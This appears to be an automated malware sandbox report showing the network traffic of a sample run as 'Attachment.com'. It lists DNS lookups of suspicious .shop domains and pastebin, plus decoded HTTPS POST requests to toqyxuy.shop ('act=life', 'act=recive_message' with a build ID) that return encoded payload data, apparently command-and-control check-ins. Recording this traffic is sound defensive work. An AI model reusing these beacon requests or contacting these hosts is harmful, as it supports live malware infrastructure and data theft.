                                                                                                                                Dec 8, 2024 01:47:10.733103037 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.733119965 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.733208895 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.733217001 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.733269930 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.737965107 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.737979889 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.738065004 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.738069057 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.738127947 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.743288994 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.743304968 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.743396997 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.743402004 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.743452072 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.757272005 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.757291079 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.757344961 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.757349014 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.757402897 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.792332888 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.792346954 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.792421103 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.792427063 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.792464972 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.797218084 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.797235012 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.797286987 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.797291040 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.797333956 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.797352076 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.802647114 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.802659988 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.802705050 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.802710056 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.802745104 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.808006048 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.808022022 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.808065891 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.808070898 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.808121920 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.808140993 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.925231934 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.925270081 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.925358057 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.925368071 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.925409079 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.930722952 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.930737019 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.930787086 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.930792093 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.930835962 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.930860043 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.935592890 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.935606956 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.935668945 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.935674906 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.935718060 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.949173927 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.949187994 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.949209929 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.949215889 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.949296951 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.949296951 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.984538078 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.984558105 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.984594107 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.984600067 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.984622955 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.984647036 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.989599943 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.989614010 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.989655972 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.989660978 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.989706993 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.989741087 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.994772911 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.994786978 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.994858027 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:10.994863033 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:10.994909048 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.000185013 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.000199080 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.000261068 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.000266075 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.000308037 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.000329971 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.117185116 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.117202997 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.117242098 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.117249966 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.117276907 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.117300034 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.122009039 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.122025013 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.122073889 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.122083902 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.122104883 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.122129917 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.127475977 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.127490044 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.127549887 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.127554893 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.127598047 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.141545057 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.141558886 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.141613007 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:11.141618967 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:11.141659021 CET49979443192.168.2.4104.21.26.127

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 8, 2024 01:44:05.653656006 CET5841553192.168.2.41.1.1.1
                                                                                                                                Dec 8, 2024 01:44:05.894443035 CET53584151.1.1.1192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:00.690176964 CET6452353192.168.2.41.1.1.1
                                                                                                                                Dec 8, 2024 01:46:00.832230091 CET53645231.1.1.1192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:21.460939884 CET6425953192.168.2.41.1.1.1
                                                                                                                                Dec 8, 2024 01:46:21.597982883 CET53642591.1.1.1192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:23.469036102 CET5472453192.168.2.41.1.1.1
                                                                                                                                Dec 8, 2024 01:46:23.695559025 CET53547241.1.1.1192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:23.757245064 CET4922053192.168.2.41.1.1.1
                                                                                                                                Dec 8, 2024 01:46:24.146702051 CET53492201.1.1.1192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:29.714133978 CET5244753192.168.2.41.1.1.1
                                                                                                                                Dec 8, 2024 01:46:30.729681015 CET5244753192.168.2.41.1.1.1
                                                                                                                                Dec 8, 2024 01:46:31.192111969 CET53524471.1.1.1192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:31.192281961 CET53524471.1.1.1192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:33.750385046 CET6478853192.168.2.41.1.1.1
                                                                                                                                Dec 8, 2024 01:46:34.244832039 CET53647881.1.1.1192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:37.995970011 CET5137353192.168.2.41.1.1.1
                                                                                                                                Dec 8, 2024 01:46:38.132822990 CET53513731.1.1.1192.168.2.4

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Dec 8, 2024 01:44:05.653656006 CET192.168.2.41.1.1.10xe1d0Standard query (0)jQTLvBhCSWe.jQTLvBhCSWeA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:00.690176964 CET192.168.2.41.1.1.10x7776Standard query (0)toqyxuy.shopA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:21.460939884 CET192.168.2.41.1.1.10x8dedStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:23.469036102 CET192.168.2.41.1.1.10xfcb5Standard query (0)silversky.clubA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:23.757245064 CET192.168.2.41.1.1.10xbc7fStandard query (0)klipcatepiu0.shopA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:29.714133978 CET192.168.2.41.1.1.10xf7ceStandard query (0)www.360.netA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:30.729681015 CET192.168.2.41.1.1.10xf7ceStandard query (0)www.360.netA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:33.750385046 CET192.168.2.41.1.1.10x3baeStandard query (0)360.netA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:37.995970011 CET192.168.2.41.1.1.10x179fStandard query (0)www.baidu.comA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 8, 2024 01:44:05.894443035 CET1.1.1.1192.168.2.40xe1d0Name error (3)jQTLvBhCSWe.jQTLvBhCSWenonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:00.832230091 CET1.1.1.1192.168.2.40x7776No error (0)toqyxuy.shop104.21.36.51A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:00.832230091 CET1.1.1.1192.168.2.40x7776No error (0)toqyxuy.shop172.67.185.163A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:21.597982883 CET1.1.1.1192.168.2.40x8dedNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:21.597982883 CET1.1.1.1192.168.2.40x8dedNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:21.597982883 CET1.1.1.1192.168.2.40x8dedNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:23.695559025 CET1.1.1.1192.168.2.40xfcb5Name error (3)silversky.clubnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:24.146702051 CET1.1.1.1192.168.2.40xbc7fNo error (0)klipcatepiu0.shop104.21.26.127A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:24.146702051 CET1.1.1.1192.168.2.40xbc7fNo error (0)klipcatepiu0.shop172.67.136.68A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:31.192111969 CET1.1.1.1192.168.2.40xf7ceNo error (0)www.360.net180.163.242.102A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:31.192281961 CET1.1.1.1192.168.2.40xf7ceNo error (0)www.360.net180.163.242.102A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:34.244832039 CET1.1.1.1192.168.2.40x3baeNo error (0)360.net180.163.242.102A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:38.132822990 CET1.1.1.1192.168.2.40x179fNo error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:38.132822990 CET1.1.1.1192.168.2.40x179fNo error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:38.132822990 CET1.1.1.1192.168.2.40x179fNo error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                Dec 8, 2024 01:46:38.132822990 CET1.1.1.1192.168.2.40x179fNo error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • toqyxuy.shop
                                                                                                                                • pastebin.com
                                                                                                                                • klipcatepiu0.shop
                                                                                                                                • www.360.net
                                                                                                                                • 360.net
                                                                                                                                • www.baidu.com

                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.449869104.21.36.514437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:02 UTC259OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 8
                                                                                                                                Host: toqyxuy.shop
                                                                                                                                2024-12-08 00:46:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                Data Ascii: act=life
                                                                                                                                2024-12-08 00:46:03 UTC1008INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=nr9146hu8kk7fld2sd5dcl9ia2; expires=Wed, 02-Apr-2025 18:32:41 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTKWq5AU%2FoEmvEXdRaQ0KCVjf1n7O1Z42auASyFQTO%2Fq7JMoeTCxdOeufFNBmmd4ta78OgMImfWi%2FU8vetUOgkhSBifywY8YuPHh89rm6qtFV9ylrM0iiTAmjd5H6hc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bc708d7343bf-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1587&rtt_var=613&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=903&delivery_rate=1759036&cwnd=252&unsent_bytes=0&cid=ad0baf00521f3ea1&ts=1169&x=0"
                                                                                                                                2024-12-08 00:46:03 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                Data Ascii: 2ok
                                                                                                                                2024-12-08 00:46:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.449878104.21.36.514437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:04 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 80
                                                                                                                                Host: toqyxuy.shop
                                                                                                                                2024-12-08 00:46:04 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 53 41 4d 53 4f 4e 26 6a 3d 37 35 36 37 66 66 66 35 34 36 38 66 35 62 36 38 32 37 38 30 61 65 61 34 63 32 65 62 36 32 36 36
                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--SAMSON&j=7567fff5468f5b682780aea4c2eb6266
                                                                                                                                2024-12-08 00:46:05 UTC1011INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=njtuktaaa835jnc5ra2msal4mt; expires=Wed, 02-Apr-2025 18:32:44 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RnizWabMawu%2F8Na56jvW2Ceug6oF4%2FOTYxRO9%2BlB4SNdqZYwYy0H8OQhoGPikl9l%2B7mV8oeqe%2BQfYK3Psx6egdzgatA1jQg1G6Y7f68GJWWp4rOgrBHy9Znzk0myDcM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bc802cccf5f6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1501&rtt_var=573&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=976&delivery_rate=1892417&cwnd=175&unsent_bytes=0&cid=58be12587b70b1bf&ts=853&x=0"
                                                                                                                                2024-12-08 00:46:05 UTC358INData Raw: 34 65 32 0d 0a 53 71 50 6e 77 6f 53 73 44 4a 56 2b 59 4b 5a 6f 70 57 71 6d 36 6c 78 37 39 34 55 41 59 63 58 39 61 47 42 66 35 74 75 43 79 7a 38 78 67 5a 48 67 76 70 67 67 74 77 30 46 68 46 4c 44 43 38 71 5a 4f 56 66 56 35 47 52 44 2f 35 73 4a 44 43 79 44 39 36 43 75 52 32 69 5a 76 4c 6d 6d 79 57 4b 33 52 45 4c 44 41 73 63 4c 79 6f 67 39 45 4a 6a 31 62 41 4b 74 6b 51 38 49 4f 6f 57 2f 34 36 64 53 4c 38 61 43 6f 2b 37 43 5a 66 67 57 44 59 52 45 68 77 2f 63 79 47 5a 5a 75 75 42 30 41 49 69 63 47 77 74 39 6d 2f 66 35 36 56 6f 6b 67 64 33 67 35 63 6c 75 2b 52 67 45 7a 51 44 4e 41 73 4b 4a 4f 42 47 48 37 47 59 4a 72 5a 38 4d 43 54 43 4d 71 2b 36 74 56 53 54 41 69 4b 4f 6d 67 43 37 77 42 45 4b 63 53 70 51 36 78 35 6b 76 44 4a 6a 33 5a 45 4f 34 30 52 4e 43 4f 6f
                                                                                                                                Data Ascii: 4e2SqPnwoSsDJV+YKZopWqm6lx794UAYcX9aGBf5tuCyz8xgZHgvpggtw0FhFLDC8qZOVfV5GRD/5sJDCyD96CuR2iZvLmmyWK3RELDAscLyog9EJj1bAKtkQ8IOoW/46dSL8aCo+7CZfgWDYREhw/cyGZZuuB0AIicGwt9m/f56Vokgd3g5clu+RgEzQDNAsKJOBGH7GYJrZ8MCTCMq+6tVSTAiKOmgC7wBEKcSpQ6x5kvDJj3ZEO40RNCOo
                                                                                                                                2024-12-08 00:46:05 UTC899INData Raw: 51 6a 4c 43 63 63 50 7a 6f 49 78 45 35 48 71 62 77 57 6e 6e 30 70 4d 66 59 4f 68 6f 50 45 64 43 38 53 56 70 2b 72 59 4c 4d 31 63 48 59 6f 54 68 77 2f 49 79 47 5a 5a 6e 65 4a 68 41 4b 79 51 43 51 6f 32 6c 72 6e 79 72 31 41 74 30 34 4f 6c 36 4d 52 74 35 52 59 4d 77 67 6e 4f 41 38 32 4e 4f 52 33 56 71 53 49 45 76 39 39 53 51 68 79 4a 73 75 79 6a 53 69 69 42 6d 75 37 2f 6a 6d 6e 37 58 46 71 45 44 73 59 4d 78 59 77 77 46 35 48 72 5a 41 32 71 6b 41 77 49 50 59 4f 7a 36 4b 46 63 4a 63 71 4b 6f 4f 50 44 61 76 45 51 41 38 46 4b 69 55 6a 44 6b 48 35 42 31 63 6c 6c 41 4c 58 64 50 77 45 7a 69 72 37 32 36 55 4a 6d 32 4d 57 6e 36 6f 34 32 74 78 49 48 79 78 6a 47 47 73 47 47 4c 42 57 51 34 57 38 41 71 5a 38 50 42 54 43 4b 76 2b 65 71 56 53 7a 41 69 36 7a 73 7a 57 72 30
                                                                                                                                Data Ascii: QjLCccPzoIxE5HqbwWnn0pMfYOhoPEdC8SVp+rYLM1cHYoThw/IyGZZneJhAKyQCQo2lrnyr1At04Ol6MRt5RYMwgnOA82NOR3VqSIEv99SQhyJsuyjSiiBmu7/jmn7XFqEDsYMxYwwF5HrZA2qkAwIPYOz6KFcJcqKoOPDavEQA8FKiUjDkH5B1cllALXdPwEzir726UJm2MWn6o42txIHyxjGGsGGLBWQ4W8AqZ8PBTCKv+eqVSzAi6zszWr0
                                                                                                                                2024-12-08 00:46:05 UTC1369INData Raw: 33 66 34 61 0d 0a 37 42 42 63 63 4a 78 59 59 30 45 74 57 70 49 67 53 2f 33 31 4a 43 45 6f 6d 70 38 71 4e 57 4f 59 4f 77 6f 2b 6a 41 61 65 46 63 48 59 6f 54 68 77 2f 49 79 47 5a 5a 6e 75 46 75 44 36 65 5a 47 41 77 79 6c 72 50 79 72 56 4d 73 7a 59 75 70 36 38 46 72 35 52 67 43 31 67 76 43 44 38 71 46 4c 42 7a 56 71 53 49 45 76 39 39 53 51 67 65 77 76 76 43 34 57 6d 72 30 68 71 37 6f 79 58 69 33 41 30 7a 64 53 73 41 45 68 4e 42 2b 47 70 6e 71 61 77 61 6f 6a 51 41 4f 50 4a 61 2b 36 61 42 58 4b 63 2b 4b 71 2b 72 4c 66 50 77 54 43 73 73 4c 79 67 58 50 6a 44 35 5a 32 36 64 6c 47 2b 66 48 53 69 4d 77 69 36 76 6a 75 42 38 64 77 6f 75 75 34 64 67 75 36 46 49 62 68 41 33 4c 53 4a 7a 49 50 78 57 5a 35 6d 30 46 72 5a 63 4a 41 79 2b 4e 74 75 69 6d 56 43 6e 43 67 61 48
                                                                                                                                Data Ascii: 3f4a7BBccJxYY0EtWpIgS/31JCEomp8qNWOYOwo+jAaeFcHYoThw/IyGZZnuFuD6eZGAwylrPyrVMszYup68Fr5RgC1gvCD8qFLBzVqSIEv99SQgewvvC4Wmr0hq7oyXi3A0zdSsAEhNB+GpnqawaojQAOPJa+6aBXKc+Kq+rLfPwTCssLygXPjD5Z26dlG+fHSiMwi6vjuB8dwouu4dgu6FIbhA3LSJzIPxWZ5m0FrZcJAy+NtuimVCnCgaH
                                                                                                                                2024-12-08 00:46:05 UTC1369INData Raw: 52 45 48 7a 41 44 4f 44 63 69 46 50 51 75 57 35 69 4a 4e 35 35 67 53 51 6d 58 45 6e 74 4f 65 66 6d 6a 65 79 37 6d 6d 79 57 4b 33 52 45 4c 46 41 73 41 47 77 4a 6f 77 43 35 76 67 59 67 57 76 6c 77 30 4f 4d 34 71 72 36 4b 68 64 4a 73 36 4e 71 65 4c 50 61 76 4d 51 42 59 52 45 68 77 2f 63 79 47 5a 5a 76 65 52 34 47 65 57 78 41 51 49 36 6c 4b 2f 37 36 55 4a 6d 32 4d 57 6e 36 6f 34 32 74 78 67 4a 7a 67 50 45 41 63 43 46 50 68 43 61 37 6d 6f 4f 72 34 30 4c 43 43 2b 41 76 4f 47 6d 56 79 7a 4a 69 61 2f 71 79 6e 7a 38 58 45 79 45 44 64 39 49 6e 4d 67 65 45 6f 50 45 63 42 48 6e 67 45 51 62 66 59 4f 31 6f 50 45 64 49 63 32 45 6f 65 7a 49 5a 66 49 52 41 73 45 41 77 41 54 45 69 44 30 66 6b 2b 70 71 43 36 75 54 43 51 38 34 67 4b 76 79 72 56 56 6f 6a 38 57 6e 2f 6f 34 32
                                                                                                                                Data Ascii: REHzADODciFPQuW5iJN55gSQmXEntOefmjey7mmyWK3RELFAsAGwJowC5vgYgWvlw0OM4qr6KhdJs6NqeLPavMQBYREhw/cyGZZveR4GeWxAQI6lK/76UJm2MWn6o42txgJzgPEAcCFPhCa7moOr40LCC+AvOGmVyzJia/qynz8XEyEDd9InMgeEoPEcBHngEQbfYO1oPEdIc2EoezIZfIRAsEAwATEiD0fk+pqC6uTCQ84gKvyrVVoj8Wn/o42
